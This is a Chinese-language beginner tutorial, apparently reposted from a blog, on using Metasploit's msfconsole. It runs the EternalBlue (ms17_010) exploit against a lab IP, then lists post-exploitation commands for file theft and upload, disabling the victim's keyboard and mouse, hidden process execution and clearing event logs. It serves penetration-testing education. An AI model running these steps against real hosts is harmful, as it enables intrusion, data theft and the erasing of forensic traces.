首页 > 其他分享 >msfconsole入门

msfconsole入门

时间:2023-03-17 15:13:13浏览次数:41  
标签:文件 入门 msfconsole 渗透 cmd 目标 010 命令

jpg改pdf

本文我们简单的来学习,msfconsole在实际的渗透测试中长应用的手段和方法。以及msf在后渗透阶段的使用。注意本文所讲到的技术仅在本地靶场环境运行,同时本文的主旨在于网络安全学习,请勿非法恶意攻击,造成后果自负。

漏洞扫描与利用

在利用msf时,我们通常是先利用其自有的模块进行漏洞扫描,这里我们以ms17_010为例 首先执行下面命令搜索相关漏洞。

search ms17_010 
图片

然后利用use进入指定模块

use exploit/windows/smb/ms17_010_eternalblue

info命令查看模块相关信息

图片利用set命令设置载荷相关信息。如

set RHOSTS 192.168.123.35

然后点击run开始渗透。如果系统存在该漏洞。则成功进入目标系统。很简单吧!

后渗透阶段

所谓后渗透阶段,就是指,当我们成功得到了目标主机的会话,需要执行的操作。这里我们将常用的操作总结如下:

进入cmd

我们需要输入shell命令后,会进入系统的cmd命令输入框。如果出现中文乱码的情况,我们chcp 65001便可以解决中文乱码问题。输入exit可以退出cmd,重新进入msf框架。

图片

查看主机是否在虚拟机运行

run post/windows/gather/checkvm
图片

获取主机详细信息

run scraper
图片

文件相关

pwd         # 查看当前目录
cd          # 切换目标目录
cat         # 读取文件内容
rm          # 删除文件
edit        # 使用vim编辑文件
ls          # 获取当前目录下的文件
mkdir       # 新建目录
rmdir       # 删除目录
download file     # 从目标系统中下载文件
upload file       # 向目标系统上传文件

禁止目标主机使用键盘鼠标

uictl disable(enable) keyboard     # 禁止(允许)目标使用键盘
uictl disable(enable) mouse        # 禁止(允许)目标使用鼠标

运行指定程序

execute -f 指定的可执行文件

-f:指定可执行文件
-H:创建一个隐藏进程
-a:传递给命令的参数
-i:跟进程进行交互
-m:从内存中执行
-t:使用当前伪造的线程令牌运行进程
-s:在给定会话中执行进程

清除事件日志

clearev

标签:文件,入门,msfconsole,渗透,cmd,目标,010,命令
From: https://www.cnblogs.com/kuangke/p/17226853.html

相关文章

  • 从0到1入门Docker(七)配置国内加速器
     配置国内加速器 上篇文章内容是Docker引擎的安装,今天这篇文章来说一下配置国内加速器​​https://blog.51cto.com/u_15485663/6127076​​学习Docker推荐大家可以看动......
  • Thingsboard 开源 IoT 平台入门
    参考:https://github.com/thingsboard/thingsboardhttps://thingsboard.io/https://docs.thingskit.com/1.Thingsboard简介ThingsBoard是一个基于Java的开源的物联......
  • 1、GO语言入门-环境准备及第一个go程序开发
    1、Windows开发环境准备(1)Golang编译器下载golang中文网:https://studygolang.com/dl或者:https://go.dev/dl/(2)下载解压,找到bin目录(3)配置环境变量右键此电脑,点击属......
  • go微服务开发:go-zero入门教程(二)
    以下内容,参考了go-zero官方文档,是对官方文档的进阶指南章节的梳理汇总。go-zero的进阶指南,请参考 https://go-zero.dev/cn/docs/advance/business-dev 通过本文,你将学......
  • MasaFramework入门第二篇,安装MasaFramework了解各个模板
    安装MasaFramework模板执行以下命令安装最新Masa的模板dotnetnew--installMasa.Template安装完成将出现四个模板MasaBlazorApp:MasaBlazorApp的模板创建的是......
  • Steamlit初识和安装入门
    Streamlit 是可以用于快速搭建Web应用的Python库。Streamlit基于tornado框架,封装了大量互动组件,同时也支持大量表格、图表、数据表等对象的渲染,并且支持栅格化响应式布......
  • 【10分钟入门】想学爬虫?关于正则表达式,看这一篇就够了!
    最近接触到正则表达式,用于匹配对应的字符串,觉得很神奇,于是开始一个学习。有句老话说得好:“爬虫写得好,牢范吃得饱。”哈哈哈当然是开个玩笑。工具推荐regex101:build,......
  • 我的Python学习之路,从入门到实战
    Python学习手册【学习线路】【学习线路图】【技能对照表】一、容器列表(list)元组(tuple)集合(set)字典(dict)1、列表线性表:数组:连续内存的实现栈:先进后出,后进先出队列:先进先出,后进......
  • 【工具篇】LaTex入门指南
    为啥要学LaText?LaTex一般用在写论文上,你的论文中可能涉及到大量的数学公式,或者你想更好的排版你的论文,那么你来对地方了,这正是LaTex所擅长的地方。LaTex通过一些命令来......
  • go微服务开发:go-zero入门教程
    以下内容,参考了go-zero官方文档,是对官方文档的进阶指南章节的梳理汇总。go-zero的进阶指南,请参考https://go-zero.dev/cn/docs/advance/business-dev第一步:下载并解压go......